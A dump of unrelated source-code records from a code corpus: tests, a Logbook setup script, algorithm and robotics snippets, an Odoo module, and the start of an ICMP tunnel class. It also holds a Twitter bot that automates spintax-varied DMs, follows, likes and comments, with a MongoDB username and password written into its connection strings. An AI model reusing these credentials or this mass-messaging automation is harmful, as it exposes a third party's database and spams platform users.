pytest\nfrom cleanroom import factory\n\n\nclass DummyClass:\n\n SHOULD_NOT_TOUCH = 42\n\n def __init__(self, num=0, sleep=0):\n import time\n time.sleep(sleep)\n self.num = num\n\n def get(self):\n return self.num\n\n def inc(self):\n self.num += 1\n\n def pid(self, sleep=0):\n import os\n import time\n time.sleep(sleep)\n return os.getpid()\n\n def boom(self):\n raise RuntimeError('something wrong.')\n\n def env(self):\n import os\n return os.getenv('CLEANROOM_ENV_VAR')\n\n def return_type(self):\n a = {\n 'a': 42,\n 'b': ['nested'],\n }\n b = set()\n return a, b\n\n def echo(self, num):\n return num\n\n def echo_boom(self, num):\n if num > 100:\n raise ValueError('boom!')\n return num\n\n\nclass DummyClassCorruptedInit:\n\n def __init__(self):\n raise ValueError('something wrong.')\n\n\ndef check_pid(pid):\n try:\n os.kill(pid, 0)\n except OSError:\n return False\n else:\n return True\n\n\ndef test_create_proc_channel():\n proc1, in_queue1, out_queue1, _, _ = factory.create_proc_channel(DummyClass)\n in_queue1.put(None)\n assert out_queue1.get()[0]\n\n proc2, in_queue2, out_queue2, _, _ = factory.create_proc_channel(DummyClass)\n in_queue2.put(None)\n assert out_queue2.get()[0]\n\n in_queue1.put(('pid', (), {}))\n in_queue2.put(('pid', (), {}))\n assert out_queue1.get()[1] != out_queue2.get()[1]\n\n in_queue1.put(('get', (), {}))\n assert out_queue1.get()[1] == 0\n\n in_queue1.put(('inc', (), {}))\n assert out_queue1.get()[1] is None\n\n in_queue1.put(('get', (), {}))\n assert out_queue1.get()[1] == 1\n\n in_queue2.put(('get', (), {}))\n assert out_queue2.get()[1] == 0\n\n proc1.terminate()\n proc2.terminate()\n\n\ndef test_create_proc_channel_exception():\n proc, in_queue, out_queue, _, _ = factory.create_proc_channel(DummyClass)\n in_queue.put(None)\n assert out_queue.get()[0]\n\n in_queue.put(('boom', (), {}))\n good, out = out_queue.get()\n assert not good\n assert isinstance(out, factory.ExceptionWrapper)\n proc.join()\n assert not proc.is_alive()\n\n\ndef test_create_instance():\n proxy1 = factory.create_instance(DummyClass)\n proxy2 = factory.create_instance(DummyClass)\n\n assert proxy1.pid() != proxy2.pid()\n\n assert proxy1.get() == 0\n assert proxy1.inc() == None\n assert proxy1.get() == 1\n with pytest.raises(RuntimeError):\n proxy1.boom()\n\n proxy3 = factory.create_instance(DummyClass, factory.CleanroomArgs(42))\n assert proxy3.get() == 42\n\n proxy3 = factory.create_instance(DummyClass, factory.CleanroomArgs(num=42))\n assert proxy3.get() == 42\n\n\ndef test_gc():\n proxy = factory.create_instance(DummyClass)\n pid = proxy.pid()\n del proxy\n gc.collect()\n assert not check_pid(pid)\n\n\ndef test_timeout():\n\n with pytest.raises(factory.TimeoutException):\n factory.create_instance(\n DummyClass,\n factory.CleanroomArgs(sleep=3),\n timeout=1,\n )\n\n proxy = factory.create_instance(DummyClass, timeout=1)\n with pytest.raises(factory.TimeoutException):\n proxy.pid(sleep=3)\n\n\ndef test_create_instance_error():\n proxy = factory.create_instance(DummyClass)\n\n with pytest.raises(NotImplementedError):\n proxy.this_does_not_exists\n\n with pytest.raises(AttributeError):\n proxy.SHOULD_NOT_TOUCH\n\n with pytest.raises(TypeError):\n proxy.get(42)\n\n class DummyClassMethod:\n\n def _crw_instance_cls(self):\n pass\n\n with pytest.raises(AttributeError):\n factory.create_instance(DummyClassMethod)\n\n\ndef test_env(monkeypatch):\n monkeypatch.setenv('CLEANROOM_ENV_VAR', '42')\n\n proxy = factory.create_instance(DummyClass)\n assert proxy.env() == '42'\n\n\ndef test_return_type():\n proxy = factory.create_instance(DummyClass)\n a, b = proxy.return_type()\n\n\ndef test_thread_safe():\n proxy = factory.create_instance(DummyClass)\n assert proxy.echo(42) == 42\n\n num_list = list(range(1000))\n with Pool(10) as pool:\n assert list(pool.map(proxy.echo, num_list)) == num_list\n with ThreadPoolExecutor(max_workers=10) as pool:\n assert list(pool.map(proxy.echo, num_list)) == num_list\n\n\ndef test_thread_safe_error():\n proxy = factory.create_instance(DummyClass)\n\n proxy.echo_boom(0)\n with pytest.raises(ValueError):\n proxy.echo_boom(101)\n with pytest.raises(RuntimeError):\n proxy.echo_boom(101)\n\n\ndef test_init_error():\n with pytest.raises(ValueError):\n factory.create_instance(DummyClassCorruptedInit)\n\n\ndef test_random_access_scheduler():\n scheduler = factory.create_scheduler(5)\n factory.create_instances_under_scheduler(scheduler, DummyClass)\n all_pids = set(scheduler.pid() for _ in range(1000))\n assert len(all_pids) == 5\n\n\ndef test_batch_random_access_scheduler():\n scheduler = factory.create_scheduler(5, scheduler_type='batch_random_access')\n factory.create_instances_under_scheduler(scheduler, DummyClass)\n\n all_pids = set(scheduler.pid([factory.CleanroomArgs()] * 1000))\n assert len(all_pids) == 5\n","sub_path":"tests/test_factory.py","file_name":"test_factory.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"130188019","text":"r\"\"\"\nLogbook\n-------\n\nAn awesome logging implementation that is fun to use.\n\nQuickstart\n``````````\n\n::\n\n from logbook import Logger\n log = Logger('A Fancy Name')\n\n log.warn('Logbook is too awesome for most applications')\n log.error(\"Can't touch this\")\n\nWorks for web apps too\n``````````````````````\n\n::\n\n from logbook import MailHandler, Processor\n\n mailhandler = MailHandler(from_addr='servererror@example.com',\n recipients=['admin@example.com'],\n level='ERROR', format_string=u'''\\\n Subject: Application Error for {record.extra[path]} [{record.extra[method]}]\n\n Message type: {record.level_name}\n Location: {record.filename}:{record.lineno}\n Module: {record.module}\n Function: {record.func_name}\n Time: {record.time:%Y-%m-%d %H:%M:%S}\n Remote IP: {record.extra[ip]}\n Request: {record.extra[path]} [{record.extra[method]}]\n\n Message:\n\n {record.message}\n ''')\n\n def handle_request(request):\n def inject_extra(record, handler):\n record.extra['ip'] = request.remote_addr\n record.extra['method'] = request.method\n record.extra['path'] = request.path\n\n with Processor(inject_extra):\n with mailhandler:\n # execute code that might fail in the context of the\n # request.\n\"\"\"\n\nimport os\nimport platform\nimport sys\nfrom itertools import chain\n\nfrom distutils.command.build_ext import build_ext\nfrom distutils.errors import (\n CCompilerError, DistutilsExecError, DistutilsPlatformError)\nfrom setuptools import Distribution as _Distribution, Extension, setup\nfrom setuptools.command.test import test as TestCommand\n\ncmdclass = {}\nif sys.version_info < (2, 6):\n raise Exception('Logbook requires Python 2.6 or higher.')\n\ncpython = platform.python_implementation() == 'CPython'\n\next_modules = [Extension('logbook._speedups', sources=['logbook/_speedups.c'])]\n\next_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)\nif sys.platform == 'win32':\n # 2.6's distutils.msvc9compiler can raise an IOError when failing to\n # find the compiler\n ext_errors += (IOError,)\n\n\nclass BuildFailed(Exception):\n def __init__(self):\n self.cause = sys.exc_info()[1] # work around py 2/3 different syntax\n\n\nclass ve_build_ext(build_ext):\n \"\"\"This class allows C extension building to fail.\"\"\"\n\n def run(self):\n try:\n build_ext.run(self)\n except DistutilsPlatformError:\n raise BuildFailed()\n\n def build_extension(self, ext):\n try:\n build_ext.build_extension(self, ext)\n except ext_errors:\n raise BuildFailed()\n except ValueError:\n # this can happen on Windows 64 bit, see Python issue 7511\n if \"'path'\" in str(sys.exc_info()[1]): # works with both py 2/3\n raise BuildFailed()\n raise\n\ncmdclass['build_ext'] = ve_build_ext\n\n\nclass Distribution(_Distribution):\n\n def has_ext_modules(self):\n # We want to always claim that we have ext_modules. This will be fine\n # if we don't actually have them (such as on PyPy) because nothing\n # will get built, however we don't want to provide an overally broad\n # Wheel package when building a wheel without C support. This will\n # ensure that Wheel knows to treat us as if the build output is\n # platform specific.\n return True\n\n\nclass PyTest(TestCommand):\n # from https://pytest.org/latest/goodpractises.html\\\n # #integration-with-setuptools-test-commands\n user_options = [('pytest-args=', 'a', 'Arguments to pass to py.test')]\n\n default_options = ['tests']\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.pytest_args = ''\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n # import here, cause outside the eggs aren't loaded\n import pytest\n errno = pytest.main(\n ' '.join(self.default_options) + ' ' + self.pytest_args)\n sys.exit(errno)\n\ncmdclass['test'] = PyTest\n\n\ndef status_msgs(*msgs):\n print('*' * 75)\n for msg in msgs:\n print(msg)\n print('*' * 75)\n\nversion_file_path = os.path.join(\n os.path.dirname(__file__), 'logbook', '__version__.py')\n\nwith open(version_file_path) as version_file:\n exec(version_file.read()) # pylint: disable=W0122\n\nextras_require = dict()\nextras_require['test'] = set(['pytest', 'pytest-cov'])\n\nif sys.version_info[:2] < (3, 3):\n extras_require['test'] |= set(['mock'])\n\nextras_require['dev'] = set(['cython']) | extras_require['test']\n\nextras_require['execnet'] = set(['execnet>=1.0.9'])\nextras_require['sqlalchemy'] = set(['sqlalchemy'])\nextras_require['redis'] = set(['redis'])\nextras_require['zmq'] = set(['pyzmq'])\nextras_require['jinja'] = set(['Jinja2'])\nextras_require['compression'] = set(['brotli'])\n\nextras_require['all'] = set(chain.from_iterable(extras_require.values()))\n\n\ndef run_setup(with_cext):\n kwargs = {}\n if with_cext:\n kwargs['ext_modules'] = ext_modules\n else:\n kwargs['ext_modules'] = []\n\n setup(\n name='Logbook',\n version=__version__,\n license='BSD',\n url='http://logbook.pocoo.org/',\n author='Armin Ronacher, Georg Brandl',\n author_email='armin.ronacher@active-4.com',\n description='A logging replacement for Python',\n long_description=__doc__,\n packages=['logbook'],\n zip_safe=False,\n platforms='any',\n cmdclass=cmdclass,\n tests_require=['pytest'],\n classifiers=[\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n\n ],\n extras_require=extras_require,\n distclass=Distribution,\n **kwargs\n )\n\nif not cpython:\n run_setup(False)\n status_msgs(\n 'WARNING: C extensions are not supported on ' +\n 'this Python platform, speedups are not enabled.',\n 'Plain-Python build succeeded.'\n )\nelif os.environ.get('DISABLE_LOGBOOK_CEXT'):\n run_setup(False)\n status_msgs(\n 'DISABLE_LOGBOOK_CEXT is set; ' +\n 'not attempting to build C extensions.',\n 'Plain-Python build succeeded.'\n )\nelse:\n try:\n run_setup(True)\n except BuildFailed as exc:\n status_msgs(\n exc.cause,\n 'WARNING: The C extension could not be compiled, ' +\n 'speedups are not enabled.',\n 'Failure information, if any, is above.',\n 'Retrying the build without the C extension now.'\n )\n\n run_setup(False)\n\n status_msgs(\n 'WARNING: The C extension could not be compiled, ' +\n 'speedups are not enabled.',\n 'Plain-Python build succeeded.'\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"223451483","text":"# In this problem, we are given k sorted lists and we are required to merge these into a single list.\n# The algorithm is a divide and conquer one as it basically splits the list of lists in half and then sorts them and then merges them resulting in a good time complexity\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n if lists == [] :\n return None\n if len(lists) == 1 :\n return lists[0]\n pos = len(lists) // 2\n node_1 = self.mergeKLists(lists[:pos])\n node_2 = self.mergeKLists(lists[pos:])\n node_3 = merge_two_lists(node_1, node_2)\n return node_3\ndef merge_two_lists(first, second) :\n if not first:\n return second\n if not second :\n return first\n i = 0\n if (first.val <= second.val) :\n val = first.val\n node = ListNode(val)\n node.next = merge_two_lists(first.next, second)\n else :\n val = second.val\n node = ListNode(val)\n node.next = merge_two_lists(first, second.next)\n return node \n","sub_path":"merging_k_sorted_lists.py","file_name":"merging_k_sorted_lists.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570256291","text":"from can import CAN_Bus\nfrom sensors import Sensors\nfrom motors.gyems import GyemsDRC\nfrom time import perf_counter, sleep\nfrom multiprocessing import Process, Array, Lock, Value\nimport matplotlib.pyplot as plt\nfrom math import cos, pi\nimport pandas as pd\n# import numpy as np\n\nRUN_TIME=10\n\nTSA_stand = {'actuator_interface':'can1', 'id':0x148, # actuator data\n 'current_limit':1000, 'gains': {'kp':5, 'kd': 4.0},'control':'motor', # control data \n # control types: 'motor' (default), 'linear_ee', 'rotational_ee'\n 'sensors_interface':'can0', # sensor data\n 'amplitude':360,'period':10} # trajectory parameters\n\ndef harmonic_trajectory(t,A=20,A0=None,T=5):\n if A0==None:\n A0=A\n return A0-A*cos(t*2*pi/T)\n\ndef pd_control(device,q_d,dq_d=0):\n data={}\n actuator=device['actuator']\n sensor=device['sensors']\n sensor.recieve_data()\n\n if device['control']=='linear_ee':\n q, dq = sensor.lin, sensor.speed_lin\n elif device['control']=='rotational_ee':\n q, dq = sensor.angle, sensor.speed_angle\n else:\n q, dq = actuator.state['angle'], actuator.state['speed']\n\n e, de = q_d - q, dq_d - dq\n \n i=actuator.state['current']\n i_d = device['gains']['kp']*e + device['gains']['kd']*de\n actuator.set_current(i_d)\n \n data['q_d']=q_d\n data['dq_d']=dq_d\n data['i_d']=i_d\n data['q']=q\n data['dq']=dq\n data['i']=i\n\n return data\n\ndef plot_results(t,y_d,y,y_label='Position [deg]',title='Position plot'):\n plt.plot(t,y_d,'r',label='Desired',linewidth=2.0)\n plt.plot(t,y,'b',label='Actual',linewidth=2.0)\n\n plt.grid(color='black', linestyle='--', linewidth=1.0, alpha = 0.7)\n plt.grid(True)\n plt.legend()\n\n plt.xlabel('Time [sec]')\n plt.ylabel(y_label)\n plt.title(title)\n plt.savefig(title+'.png')\n plt.clf()\n return\n\nTSA_stand['actuator_bus'] = CAN_Bus(interface = TSA_stand['actuator_interface'])\nTSA_stand['actuator'] = GyemsDRC(can_bus=TSA_stand['actuator_bus'], device_id=TSA_stand['id'])\nTSA_stand['actuator'].set_degrees()\nTSA_stand['actuator'].current_limit = TSA_stand['current_limit']\nTSA_stand['actuator'].set_zero(persistant=True)\nTSA_stand['actuator'].enable()\n\nTSA_stand['sensor_bus']=CAN_Bus(interface=TSA_stand['sensors_interface'])\nTSA_stand['sensors']=Sensors(can_bus=TSA_stand['sensor_bus'])\n\ndata = {'t':[], 'q_d':[], 'dq_d':[], 'i_d':[], 'q':[], 'dq':[], 'i':[]}\nfeedback_labels=['q_d','dq_d','i_d','q','dq','i']\n\nt0=perf_counter()\nt=0\ntry:\n while t= self.maxtimes:\n raise StopIteration\n \n value = self.data[self.index % len(self.data)]\n self.index += 1\n return value\n \n\nclass Circle:\n def __init__(self, data, maxtimes):\n self.data = data\n self.maxtimes = maxtimes\n \n def __iter__(self):\n return CircleIterator(self.data, self.maxtimes)\n \n\n\nc = Circle('abcd', 7) \n\n# abcdabc\nprint('** A **')\nfor one_item in c:\n print(one_item)\n \nprint('** B **')\nfor one_item in c:\n print(one_item)","sub_path":"ex47.py","file_name":"ex47.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"199301082","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\n\nclass PurchaseOrder(models.Model):\n _name = 'purchase.order'\n _inherit = 'purchase.order'\n\n signature_image = fields.Binary(string='Signature')\n signature_added = fields.Boolean(\"Signature added?\", default=False)\n\n @api.multi\n def button_confirm(self):\n if self.signature_added == True:\n for order in self:\n if order.state not in ['draft', 'sent']:\n continue\n order._add_supplier_to_product()\n # Deal with double validation process\n if order.company_id.po_double_validation == 'one_step' \\\n or (order.company_id.po_double_validation == 'two_step' and \\\n order.amount_total < self.env.user.company_id.currency_id.compute(\n order.company_id.po_double_validation_amount, order.currency_id)) \\\n or order.user_has_groups('purchase.group_purchase_manager'):\n order.button_approve()\n else:\n order.write({'state': 'to approve'})\n return True\n else:\n raise UserError(\"Please, Get a signature from manager.\")\n\n","sub_path":"ht_get_digital_approval/models/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"575426186","text":"import os, sys\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nfrom datetime import datetime\n\n\nfrom time import sleep\nimport random\nimport spintax\nfrom pymongo import MongoClient\n\nimport csv\nimport logging\nimport xlrd\nimport json\nimport re\nimport math\n\nlogging.basicConfig(filename=\"logfilename.log\", level=logging.INFO)\n\nclass Bot:\n def __init__(self):\n self.driver = \"\"\n self.path_to_chromedriver = \"C:/Users/Administrator/Documents/bot/chromedriver.exe\"\n self.browser_url = \"\"\n self.target_url = \"https://twitter.com/messages\"\n self.home_url = \"https://twitter.com/home\"\n self.base_url = \"https://twitter.com/\"\n self.notification_url = \"https://twitter.com/notifications\"\n self.spintax_url = \"https://www.linkcollider.com/page/spintaxtester\"\n self.msg1_url = \"\"\n self.msg2_url = \"\"\n self.comment_url = \"\"\n self.cnt = 0\n self.browser_port_list = [9230]\n self.account_username_list = [\"@HildaRo49368042\"]\n self.account_username = \"\"\n self.profile_index = 0\n # self.browser_port_list = [9228,9227]\n self.excelPath = \"C:\\\\Users\\\\Administrator\\\\Documents\\\\bot\\\\files\\\\data.csv\"\n self.publicProfileStep = []\n self.privateProfileStep = []\n self.username = ''\n self.name = ''\n self._id = ''\n self.user_id = ''\n self.url = ''\n\n self.client = \"\"\n self.username_db = \"\"\n\n def driver_startup(self, port):\n chrome_options = Options()\n self.browser_url = f\"127.0.0.1:{port}\"\n chrome_options.add_experimental_option(\"debuggerAddress\", self.browser_url)\n self.driver = webdriver.Chrome(self.path_to_chromedriver, options=chrome_options)\n\n def getDbData(self):\n client = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/test?authSource=admin&replicaSet=atlas-4jftde-shard-0&readPreference=primary&appname=MongoDB%20Compass&ssl=true')\n mongodb = client[\"peachly_twitter_tweets_usernames\"]\n collection = mongodb[\"usernames\"]\n for x in collection.find({},{\"_id\":\"0\", \"user_id\":\"1\",\"username\": \"1\"}):\n print(type(x),x)\n return collection\n\n def saveData(self, data):\n myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/test?retryWrites=true&w=majority')\n print(\"69\")\n mydb = myclient[\"peachly_dms_disabled\"]\n private = mydb[\"private\"]\n public = mydb[\"public\"]\n print(\"ok\", data)\n res = public.insert_one(data)\n print(\"doneee\", res.inserted_id)\n\n def saveMsg(self, data):\n myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/peachly_twitter_bots?authSource=admin&replicaSet=atlas-4jftde-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')\n db = myclient[\"peachly_twitter_bots\"]\n messages = db['messages']\n res = messages.insert_one(data)\n print(\"msg saved\", res.inserted_id)\n\n def saveNewMsg(self, data):\n myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/peachly_twitter_bots?authSource=admin&replicaSet=atlas-4jftde-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')\n db = myclient[\"peachly_twitter_bots\"]\n messages = db['new_messages']\n res = messages.insert_one(data)\n print(\"msg saved\", res.inserted_id)\n\n def saveComment(self, data):\n db = self.client[\"peachly_twitter_bots\"]\n comments = db['comments']\n res = comments.insert_one(data)\n print(\"comment saved\", res.inserted_id)\n\n def getMsg(self, username, coming_time):\n myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/peachly_twitter_bots?authSource=admin&replicaSet=atlas-4jftde-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')\n db = myclient[\"peachly_twitter_bots\"]\n messages = db['messages']\n print(\"here is result\")\n for x in messages.find({}):\n print(x)\n if x[\"username\"] == username and x[\"coming_time\"] == coming_time:\n return True\n return False\n\n def getReplyMsg(self):\n myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/peachly_twitter_bots?authSource=admin&replicaSet=atlas-4jftde-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')\n db = myclient[\"peachly_twitter_bots\"]\n reply_messages = db['reply_messages']\n return reply_messages\n\n def updateComment(u_name, reply_content, time):\n db = self.client[\"peachly_twitter_bots\"]\n comments = db['comments']\n result = comments.find({\"to_username\": u_name, \"coming_time\": time, \"content\": reply_content}, {})\n if result.count() == 0:\n #save in the db\n dateTimeObj = datetime.now()\n data = {\n \"to_username\": u_name,\n \"account_username\": self.account_username,\n \"coming_time\": time,\n \"save_time\": dateTimeObj,\n \"bot_number\":2,\n \"profile\": self.profile_index\n }\n self.saveComment(data)\n return True\n else:\n return False\n\n def updateReport(self, updateField):\n myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/peachly_twitter_bots?authSource=admin&replicaSet=atlas-4jftde-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')\n db = myclient[\"peachly_twitter_bots\"]\n reply_messages = db['reports']\n print(\"inside suc dm reporot\")\n if reply_messages.count() == 0:\n print(\"ok\")\n data = {\n \"bot1_successful_dm\": 0,\n \"bot1_unsuccessful_dm\":0,\n \"bot1_spintax1_reply\": 0,\n \"bot2_successful_dm\": 0,\n \"bot2_unsuccessful_dm\":0,\n \"bot2_spintax1_reply\": 0,\n }\n reply_messages.insert_one(data) \n else:\n print(\"else\")\n for x in reply_messages.find({}):\n reply_messages.update_one({\"_id\": x[\"_id\"]}, {\"$inc\": {updateField:1}}) \n\n def checkIfSpintax2Reply(self, username):\n client = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/test?authSource=admin&replicaSet=atlas-4jftde-shard-0&readPreference=primary&appname=MongoDB%20Compass&ssl=true')\n mongodb = client[\"peachly_twitter_tweets_usernames\"] \n col = mongodb[\"public\"]\n result = col.find({\"username\": username}, {\"spintax2_reply\": \"1\"})\n if result.count() == 0:\n return False\n else:\n return True\n\n\n def manage(self,public_or_private, msg1, msg2, commentURL,userNum):\n print(\"bot starts\")\n self.msg1_url = msg1\n self.msg2_url = msg2\n self.comment_url = commentURL\n # self.publicProfileStep = publicStep\n # self.privateProfileStep = privateStep\n self.client = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/test?authSource=admin&replicaSet=atlas-4jftde-shard-0&readPreference=primary&appname=MongoDB%20Compass&ssl=true')\n self.username_db = self.client[\"peachly_twitter_tweets_usernames\"]\n\n self.twitter_bot_db = self.client[\"peachly_twitter_bots\"]\n bot_collection = self.twitter_bot_db[\"bot_infos\"]\n reply_msg_collection = self.twitter_bot_db[\"reply_messages\"]\n comment_collection = self.twitter_bot_db[\"reply_comments\"]\n used_account_col = self.twitter_bot_db['used_leads']\n report_col = self.twitter_bot_db[\"reports\"]\n collection = self.username_db[public_or_private]\n print(type(collection))\n self.username_collection = collection\n index = 1\n\n\n for each_user in used_account_col.find({}):\n self._id = each_user['_id']\n self.username = each_user['username']\n self.url = each_user['url']\n print(\"each\", each_user)\n for each_item in each_user:\n print(\"1000\", each_user[each_item])\n current_time = datetime.now()\n if each_item == \"dm\" and each_user[each_item] == True:\n dm_time = each_user[\"dm_time\"]\n print(\"dm_time\", dm_time)\n time_diff = current_time - dm_time\n time_diff_hour = math.floor(time_diff.total_seconds() / 3600)\n if (time_diff_hour >= 48):\n print(\"205\")\n #check the dms once more\n\n #update the report\n bot_num = each_user[\"bot_number\"]\n for x in report_col.find({\"bot_number\": bot_num}):\n report_col.update_one({\"_id\": x[\"_id\"]}, {\"$inc\": {\"expired_dm\":1}}) \n\n collection.update_one({\"username\": each_user['username']}, {\"$set\": {'dm_expired': True}})\n used_account_col.update_one({\"_id\": each_user['_id']}, {\"$set\": {'dm': False, 'dm_expired': True}})\n\n\n elif each_item == \"comment\" and each_user[each_item] == True:\n comment_time = each_user[\"comment_time\"]\n print(\"comment_time\", comment_time)\n time_diff = current_time - comment_time\n time_diff_hour = math.floor(time_diff.total_seconds() / 3600)\n print(math.floor(time_diff.total_seconds() / 3600))\n if (time_diff_hour >= 48):\n print(\"comment expired\")\n #check the comment reply once more\n\n #update the report\n bot_num = each_user[\"bot_number\"]\n for x in report_col.find({\"bot_number\": bot_num}):\n report_col.update_one({\"_id\": x[\"_id\"]}, {\"$inc\": {\"expired_comment\":1}}) \n print(\"here\")\n\n collection.update_one({\"username\": each_user['username']}, {\"$set\": {'comment_expired': True}})\n used_account_col.update_one({\"_id\": each_user['_id']}, {\"$set\": {'comment': False, 'comment_expired': True}})\n\n # delete\n # used_account_col.delete_one({\"_id\": each_user['_id']})\n\n print(\"index\", index)\n index = index + 1\n return \"end\"\n \n\n def follow(self):\n self.driver.get(self.home_url)\n sleep(random.randint(5,7))\n search_input = self.driver.find_element_by_xpath('//form[@aria-label=\"Search Twitter\"]//input')\n search_input.send_keys(self.username)\n sleep(random.randint(3,6))\n\n first_item = self.driver.find_element_by_xpath('//div[@role=\"listbox\"]//div[@role=\"option\"][2]').click()\n sleep(random.randint(3,5))\n print(\"following...\")\n try:\n follow_btn = self.driver.find_element_by_xpath('//div[@data-testid=\"placementTracking\"]//div[@role=\"button\"]').click()\n sleep(random.randint(3,5))\n #update the status field in the database\n # following_person = AccountInfo.query.filter_by(username=self.username).first()\n # print(\"dddbbb\", following_person, following_person.status)\n # following_person.status = \"following\"\n # db.session.commit()\n\n return True\n\n except:\n sleep(1)\n #update the status field in the database\n # following_person = AccountInfo.query.filter_by(username=self.username).first()\n # print(\"dddbbb\", following_person, following_person.status)\n # following_person.status = \"suspended\"\n # db.session.commit()\n \n return False\n\n\n def likeTweets(self):\n print(\"like tweets started\")\n self.driver.get(self.home_url)\n sleep(random.randint(2,5))\n search_input = self.driver.find_element_by_xpath('//form[@aria-label=\"Search Twitter\"]//input')\n search_input.send_keys(self.username)\n sleep(random.randint(3,5))\n first_item = self.driver.find_element_by_xpath('//div[@role=\"listbox\"]//div[@role=\"option\"][2]').click()\n sleep(random.randint(2,4))\n try:\n like_elements = self.driver.find_elements_by_xpath('//section[@role=\"region\"]/div/div//div//article//div[@data-testid=\"like\"]')\n index = 0\n for each_like in like_elements:\n each_like.click()\n sleep(random.randint(5,7))\n index = index + 1\n if index == 2 :\n break\n except:\n sleep(2)\n pass\n return True\n\n def comment(self):\n print(\"comment started\")\n try:\n #get url of the name\n profile_link = self.base_url + self.username\n self.driver.get(profile_link)\n sleep(5)\n print(\"633\")\n comment_elements = self.driver.find_elements_by_xpath('//section[@role=\"region\"]/div/div//div//article//div[@data-testid=\"reply\"]')\n comment_elements[0].click()\n sleep(random.randint(4,6))\n print(\"65656\")\n # pyauto gui\n self.driver.get(self.spintax_url)\n sleep(random.randint(7,10))\n print(\"6660\")\n\n self.driver.get(self.comment_url)\n print(\"hereee\")\n sleep(10)\n # run pyautogui\n pyautogui_class = PyAutoGuiClass()\n pyautogui_class.pySpintaxComment()\n \n sleep(5)\n sleep(random.randint(4,6))\n print(\"6666\")\n\n reply_button = self.driver.find_element_by_xpath('//div[@data-testid=\"tweetButton\"]/div')\n reply_button.click()\n sleep(random.randint(3,4))\n self.driver.minimize_window()\n #save in the db\n dateTimeObj = datetime.now()\n data = {\n \"to_username\": self.username,\n \"account_username\": self.account_username,\n \"coming_time\": \"\",\n \"save_time\": dateTimeObj,\n \"bot_number\":2,\n \"profile\": self.profile_index,\n \"new_reply\": True\n }\n self.saveComment(data)\n return True\n except:\n print(\"comment error\")\n self.driver.minimize_window()\n sleep(2)\n return False\n\n\n\nif __name__ == '__main__':\n bot = Bot()\n bot.manage(\"public\", 'bot1_dm1_link', \"bot1_dm2_link\",\"bot1_dm1_link\",\"10\")\n","sub_path":"bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"138350773","text":"import socket\r\nimport time\r\nimport os\r\nimport threading\r\nimport base64\r\nimport struct\r\nimport sys\r\nclass IcmpTunnel:\r\n DATA_LEN = 1024\r\n MAX_DATA_LEN = 712\r\n ADDR = 0\r\n MODE = 1\r\n ID = 0xB\r\n def __init__(self,addr,mode):\r\n raw_socket = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.getprotobyname(\"icmp\"))\r\n #raw_socket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\r\n if mode == 0:\r\n raw_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n raw_socket.bind(addr)\r\n self.MODE = 0\r\n self.icmp_socket = raw_socket\r\n self.ADDR = addr\r\n \r\n def checkSum(self,packet):\r\n sum = 0\r\n countTo = (len(packet)//2)*2\r\n count = 0\r\n while count < countTo:\r\n sum += ((packet[count+1] << 8) | packet[count])\r\n count += 2\r\n \r\n if countTo < len(packet):\r\n sum += packet[len(packet) - 1]\r\n sum = sum & 0xffffffff\r\n \r\n sum = (sum >> 16) + (sum & 0xffff)\r\n sum = sum + (sum >> 16)\r\n answer = ~sum\r\n answer = answer & 0xffff\r\n answer = answer >> 8 | (answer << 8 & 0xff00)\r\n return answer\r\n\r\n def getIcmpData(self,packet):\r\n 